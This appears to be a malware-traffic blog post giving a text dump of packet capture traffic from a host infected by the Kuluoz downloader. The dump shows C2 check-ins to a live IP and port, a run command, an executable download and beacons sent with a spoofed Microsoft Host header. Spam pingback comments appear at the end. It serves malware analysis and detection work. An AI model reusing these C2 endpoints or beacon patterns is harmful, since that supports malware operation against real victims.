Kuluoz Trojan Downloader Loads Microsoft spoofed Medfos Trojan Malware PCAP converted Traffic Sample

By | June 20, 2015

2012-10-04 10:29:04.777210 IP 192.168.248.165.1111 > 85.214.114.16.8080: Flags [P.], seq 1:274, ack 1, win 64240, length 273
E..9.t@…x…..U.r..W….aM.H..P…….GET /C338D6D09CA45230980EF28CDAEF57A1E80E725685E70E5ED4088FFB98E21ECC52E0A6FB44B8C30DEA90454BD8E292E523BE43AE9871A36910BACBD3E09B23700FDE12BC8A5F54E0FB8BDC91E6D5B4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 85.214.114.16:8080
2012-10-04 10:29:04.777406 IP 85.214.114.16.8080 > 192.168.248.165.1111: Flags [.], ack 274, win 64240, length 0
E..(……..U.r……..W.H….b^P………….
2012-10-04 10:29:05.162014 IP 85.214.114.16.8080 > 192.168.248.165.1111: Flags [FP.], seq 1:278, ack 274, win 64240, length 277
E..=……..U.r……..W.H….b^P…B…HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 05 Jul 2013 14:42:42 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=run&u=/get/b2f7e9141eb124ce3152352c5df520f7.exe&crc=88e80f9629932c2368fc35d6f47d7a84
2012-10-04 10:29:05.162114 IP 192.168.248.165.1111 > 85.214.114.16.8080: Flags [.], ack 279, win 63963, length 0
E..(.u@…y&….U.r..W….b^.H..P…….
2012-10-04 10:29:05.162371 IP 192.168.248.165.1111 > 85.214.114.16.8080: Flags [F.], seq 274, ack 279, win 63963, length 0
E..(.v@…y%….U.r..W….b^.H..P…….
2012-10-04 10:29:05.162520 IP 85.214.114.16.8080 > 192.168.248.165.1111: Flags [.], ack 275, win 64239, length 0
E..(……..U.r……..W.H….b_P………….
2012-10-04 10:29:05.163521 IP 192.168.248.165.1113 > 85.214.114.16.8080: Flags [S], seq 2355996440, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.w@…y…..U.r..Y…m……p……………
2012-10-04 10:29:05.267443 IP 85.214.114.16.8080 > 192.168.248.165.1113: Flags [S.], seq 1978168396, ack 2355996441, win 64240, options [mss 1460], length 0
E..,……..U.r……..Yu.tL.m..`….K……..
2012-10-04 10:29:05.267483 IP 192.168.248.165.1113 > 85.214.114.16.8080: Flags [.], ack 1, win 64240, length 0
E..(.x@…y#….U.r..Y…m..u.tMP…….
2012-10-04 10:29:05.267646 IP 192.168.248.165.1113 > 85.214.114.16.8080: Flags [P.], seq 1:157, ack 1, win 64240, length 156
E….y@…x…..U.r..Y…m..u.tMP…….GET //get/b2f7e9141eb124ce3152352c5df520f7.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 85.214.114.16:8080
2012-10-04 10:29:05.268195 IP 85.214.114.16.8080 > 192.168.248.165.1113: Flags [.], ack 157, win 64240, length 0
E..(……..U.r……..Yu.tM.m..P….l……..
2012-10-04 10:29:05.818462 IP 85.214.114.16.8080 > 192.168.248.165.1113: Flags [P.], seq 1:1229, ack 157, win 64240, length 1228
E………..U.r……..Yu.tM.m..P…….HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 05 Jul 2013 14:42:42 GMT
Content-Type: application/octet-stream
Content-Length: 221696
Connection: close
X-Powered-By: PHP/5.4.4-7
Content-Description: File Transfer
Content-Disposition: attachment; filename=b2f7e9141eb124ce3152352c5df520f7.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………5.T.[.T.[.T.[…..S.[…B.R.[.G…V.[…..[.[.T.Z…[.Q.T.H.[.Q…..[…|.].[.Q.;…[.Q…U.[…..U.[.Q…U.[.RichT.[………PE..L…Bs7H……………
………….|…………@……………………………W”……………………………………x….p..0………………………………………………………………………………………………text…………………………. ..`.rdata..(=…….>………………@..@.data…eM… …L…
2012-10-04 10:29:09.151146 IP 192.168.248.165.1114 > 74.125.228.51.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230
E…..@….”….J}.3.Z.PA…G.+.P…….GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Host: www.google.com
Cache-Control: no-cache
Cookie: PREF=ID=e1ccc9997d0ce1c7:FF=0:TM=1348945399:LM=1348945399:S=lS6flBW4jY2rFegW
2012-10-04 10:29:09.151278 IP 74.125.228.51.80 > 192.168.248.165.1114: Flags [.], ack 231, win 64240, length 0
E..(……..J}.3…..P.ZG.+.A…P………….
2012-10-04 10:29:09.195963 IP 74.125.228.51.80 > 192.168.248.165.1114: Flags [.], seq 1:1461, ack 231, win 64240, length 1460
E……….4J}.3…..P.ZG.+.A…P…….HTTP/1.1 200 OK
Date: Fri, 05 Jul 2013 14:42:46 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=e1ccc9997d0ce1c7:FF=0:TM=1348945399:LM=1373035366:S=oZWzYmi6V0EgHYja; expires=Sun, 05-Jul-2015 14:42:46 GMT; path=/; domain=.google.com
Set-Cookie: NID=67=Hvl93uLPMFUTu3oq-Jb5QGA_NlevOBlZyZDM3lUcd-74gPCtMC7kw519mx-W1hwb1yYB1EpB8K26uo3VnZz73T6Iw3E4xFktw5527BFroA_YulKNf58z6pVKbRLCYlEl; expires=Sat, 04-Jan-2014 14:42:46 GMT; path=/; domain=.google.com; HttpOnly
P3P: CP=”This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info.”
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Transfer-Encoding: chunked

8000
2012-10-04 10:29:09.239489 IP 192.168.248.165.53 > 8.8.8.8.53: 30938+ A? cdn169.hostingetcnet.com. (42)
E..F……pv………5.5.2..x…………cdn169.hostingetcnet.com…..
2012-10-04 10:29:09.239563 IP 192.168.248.165.53 > 4.2.2.2.53: 30938+ A? cdn169.hostingetcnet.com. (42)
E..F……z……….5.5.2..x…………cdn169.hostingetcnet.com…..
2012-10-04 10:29:09.281274 IP 8.8.8.8.53 > 192.168.248.165.53: 30938 1/0/0 A 78.131.140.151 (58)
E..V.)……………5.5.B..x…………cdn169.hostingetcnet.com……………..N…
2012-10-04 10:29:09.290418 IP 192.168.248.165.1115 > 78.140.131.151.80: Flags [S], seq 1861748647, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…n…..N….[.Pn…….p….r……….
2012-10-04 10:29:09.377265 IP 78.140.131.151.80 > 192.168.248.165.1115: Flags [S.], seq 2869016512, ack 1861748648, win 64240, options [mss 1460], length 0
E..,.*…..0N……..P.[….n…`…3………
2012-10-04 10:29:09.377299 IP 192.168.248.165.1115 > 78.140.131.151.80: Flags [.], ack 1, win 64240, length 0
E..(..@…n…..N….[.Pn…….P…Kc..
2012-10-04 10:29:09.377461 IP 192.168.248.165.1115 > 78.140.131.151.80: Flags [P.], seq 1:262, ack 1, win 64240, length 261
E..-..@…m…..N….[.Pn…….P…….GET /uploading/id=1083242033&u=4WSQvjA+sJYdYDvBmxr7tGGiKtEuwWFmT3uFzRjeacviRtjYIg2xcqQMAWYaZM4RqxalcusDRHEPXTvreO/0wg== HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Cache-Control: no-cache

2012-10-04 10:29:39.461570 IP 192.168.248.165.1115 > 78.140.131.151.80: Flags [P.], seq 262:523, ack 669, win 63572, length 261
E..-..@…m…..N….[.Pn……]P..T….GET /uploading/id=1083242033&u=4WSQvjA+sJYdYDvBmxr7tGGiKtEuwWFmT3uFzRjeacviRtjYIg2xcqQMAWYaZM4RqxalcusDRHEPXTvreO/0wg== HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Cache-Control: no-cache

Share Button

2 thoughts on “Kuluoz Trojan Downloader Loads Microsoft spoofed Medfos Trojan Malware PCAP converted Traffic Sample

  1. Pingback: click here link click click this link good site here is the site http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www.clemsondeckbuilders.com/ www.clemsondeckbuilders.com/ clemsondeckbuilders.com/ http://www

  2. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *